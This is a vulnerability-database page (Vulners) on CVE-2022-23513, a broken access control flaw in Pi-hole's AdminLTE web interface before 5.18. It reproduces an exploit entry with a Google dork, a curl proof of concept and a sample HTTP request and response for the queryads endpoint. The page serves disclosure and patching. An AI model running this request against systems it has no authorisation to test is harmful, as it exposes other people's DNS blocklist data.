Vulners
Lucene search
AdminLTE PiHole 5.18 - Broken Access Control
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | AdminLTE PiHole 5.18 - Broken Access Control Vulnerability | 4 Sep 202300:00 | – | zdt |
 | CVE-2022-23513 | 23 Dec 202202:14 | – | circl |
 | Pi-hole 访问控制错误漏洞 | 23 Dec 202200:00 | – | cnnvd |
 | CVE-2022-23513 | 22 Dec 202223:17 | – | cve |
 | CVE-2022-23513 Pi-Hole/AdminLTE vulnerable due to improper access control in queryads endpoint | 22 Dec 202223:17 | – | cvelist |
 | EUVD-2022-28554 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-23513 | 23 Dec 202200:15 | – | nvd |
 | Pi-hole Web Interface 2.0 <= 5.17 Broken Access Control Vulnerability | 1 Dec 202300:00 | – | openvas |
 | CVE-2022-23513 Pi-Hole/AdminLTE vulnerable due to improper access control in queryads endpoint | 22 Dec 202223:17 | – | osv |
 | AdminLTE PiHole Broken Access Control | 4 Sep 202300:00 | – | packetstorm |
10
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)
# Date: 21.12.2022
# Exploit Author: kv1to
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17
# Tested on: Raspbian / Debian
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497
# CVE : CVE-2022-23513
In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.
## Proof Of Concept with curl:
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'
## HTTP requests
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1
HOST: pi.hole
Cookie: [..SNIPPED..]
[..SNIPPED..]
## HTTP Response
HTTP/1.1 200 OK
[..SNIPPED..]
data: Match found in [..SNIPPED..]
data: <domain>
data: <domain>
data: <domain>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Sep 2023 00:00Current
5.5Medium risk
Vulners AI Score5.5
CVSS 3.15.3
EPSS0.13916
SSVC